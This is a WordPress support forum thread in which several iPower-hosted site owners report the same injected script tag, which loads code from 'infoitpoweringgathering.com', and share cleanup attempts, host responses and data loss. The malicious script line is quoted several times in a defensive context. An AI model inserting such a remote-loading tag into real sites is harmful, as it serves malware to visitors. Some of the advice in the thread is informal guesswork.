WordPress.org

Ready to get started?Download WordPress

Forums

[closed] I did the updrage to the latest version now I have some strange code. (80 posts)

  1. jasonc2
    Member
    Posted 2 years ago #

    I just upgraded to the newest version of wordpress and on my pages I am seeing this code.....

    <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>

    any idea what this is and what it effects or how to get rid of it?

  2. Jonas Grumby
    Member
    Posted 2 years ago #

    Try switching to the default theme and deactivating all plugins. What is the URL of the site? If I go to http://infoitpoweringgathering.com/ I get a blank page.

  3. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Have you tried:

    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Ten theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  4. jasonc2
    Member
    Posted 2 years ago #

    The url for my site is http://www.forgednc.com the code doesn't show up on the site but in the backend when I view the site.

    I get a blank page when I go to http://infoitpoweringgathering.com/ as well that is why I can't tell wtf it is.

    Not sure how to reset the plugins. But can try the deactivating.

  5. Jonas Grumby
    Member
    Posted 2 years ago #

    If you have a good code editing program with "advanced search" you can download all of the files from your site and find out which one has that link to infoitpoweringgathering.com in it. You have a custom theme, so is that some reference to your theme developer? Try the things esmi suggested. "resetting the plugins folder" can be done by renaming the old one and creating a new one via FTP.

  6. lyricandariasmom
    Member
    Posted 2 years ago #

    I have the same thing ... I go to my dashboard and see <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> in the quickpress section in the contents area. I can't delete it for anything, trying to find out what it is, how to get rid of it, seeing if my host knows anything or can help...

    I have no idea what i'm doing... Or what that is?! I didn't upload or install anything new lately, and that infoitpoweringgathering.com has nothing to do with my site, developer or host...

  7. Jonas Grumby
    Member
    Posted 2 years ago #

    Your sites may have been hacked. Are you running a firewall?

    http://wordpress.org/extend/plugins/wordpress-firewall-2/

  8. Jonas Grumby
    Member
    Posted 2 years ago #

    I'm not really sure why they released Firewall2 as a new plugin rather than as a new version of the original plugin, but there it is.

  9. lyricandariasmom
    Member
    Posted 2 years ago #

    Thanks Jonas, I didn't have one installed but I do now... Now just to figure out WTF is going on with this script code and how to get rid of it!

  10. lyricandariasmom
    Member
    Posted 2 years ago #

    Interesting... Installed that firewall now the script code is gone...
    THANKS!

  11. Jonas Grumby
    Member
    Posted 2 years ago #

    You're welcome.

  12. lyricandariasmom
    Member
    Posted 2 years ago #

    HA! Just an update, it was a coincidence that the firewall did anything, just heard from my host and I was hacked - virus attack they said.. To the OP contact your host!

  13. jasonc2
    Member
    Posted 2 years ago #

    I just installed the firewall and the script is still there. Ok so I will try to contact my host to see if it is a virus. Is there a virus remover for a website?

  14. lyricandariasmom
    Member
    Posted 2 years ago #

    No idea... My host fixed the issue... just out of curiosity, who's your host Jason? Mine is ipower

  15. jasonc2
    Member
    Posted 2 years ago #

    I am on ipower as well. Did you contact them or did they contact you?

  16. lyricandariasmom
    Member
    Posted 2 years ago #

    I contacted them..

  17. Jonas Grumby
    Member
    Posted 2 years ago #

    Well, glad you got it sorted but you should still run a firewall and one or two other security plugins.

  18. jasonc2
    Member
    Posted 2 years ago #

    Yeah I loaded the firewall too. Didn't know that was necessary. I thought the hosting provider would handle that.

  19. lyricandariasmom
    Member
    Posted 2 years ago #

    Had no idea, so thanks Jonas.. What other security plugins do you recommend?

  20. sanshik
    Member
    Posted 2 years ago #

    i have the same problem guys, i run different wordpress blogs in my host and all of theme got infected with this male-ware code, i am also hosting my sites with ipower.com and the tech guys did not seem to have a solution yet, please if any one of you has solved this problem, show me how to do the same step by step, i have already installed firewall plugin but nothing changed.
    this male-ware code seems to be new, the domain name it promotes is only one day old yet and it it's servers are in lativa.

  21. lyricandariasmom
    Member
    Posted 2 years ago #

    Well, they solved my problem, got rid of all the malware and took ALL of my blog posts and backups with it...

    I now have a BLANK blog, 3 years of posts GONE (yes I know stupid me for not having a backup on my computer), so before you loose everything make sure you have a backup. I did nothing, they took care of the situation.

  22. sanshik
    Member
    Posted 2 years ago #

    when i first told theme about this problem i asked to not take any action before the make sure i will not lose any data, then i started to backup all my sites, even i think the male-ware is still hidden in the backup itself, but i hope to find a solution without removing my site

  23. jasonc2
    Member
    Posted 2 years ago #

    So i have contacted Ipower and so far they have no idea. They tell me they can't scan the site for me and that I will have to do it. If I freaking knew how to do that I wouldn't need them. They should have things in place to prevent this type of attack anyway shouldn't they?

  24. sanshik
    Member
    Posted 2 years ago #

    i think the male-ware code came from their servers, all infected sites seems to be only with ipower

  25. lyricandariasmom
    Member
    Posted 2 years ago #

    No idea?? I'm sure they have SOME idea since it seems like it's their servers that got effected since it's more than just 1 of us finding this out now...

    Here's what they originally told me:
    We have found some SQL injection codes from your database and we have removed it. We suggest you to upload clean copy of your database back up from your local system.

    Yea, they just removed EVERYTHING though so beware.... If your not getting online support CALL THEM!

  26. lyricandariasmom
    Member
    Posted 2 years ago #

    I highly suggest if you have facebook to let IPOWER know whats going on on their page, I'm getting more help there than their support http://www.facebook.com/#!/ipower

  27. jasonc2
    Member
    Posted 2 years ago #

    Just did it. Great idea. Thanks.

  28. raul.escamilla
    Member
    Posted 2 years ago #

    coincidence? I do not think I've had this problem twice with PowWeb, ipower sister company, and since one day I have exactly the same attack on one of my wordpress web sites hosted on IPOWER.

  29. GracelandWest
    Member
    Posted 2 years ago #

    My client's site is another IPOWER hosted site with the <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> script in the QuickPress section.

    I opened up a page on the site and AVG popped up a malware warning. Here are the details.

    "5/17/2011, 3:21:14 PM";"NT AUTHORITY\SYSTEM";"IDP";"Process OS_PACK107_2129[1].EXE was detected."

    I've been on the phone with IPOWER support with no success. I'll post if I find a solution.

  30. davidallred
    Member
    Posted 2 years ago #

    I am with Ipower as well. So obviously their databases have been hacked somehow. I also installed the firewall and <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> is still there. It happened on all of my WP blogs I am hosting, which is about 6 or so.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags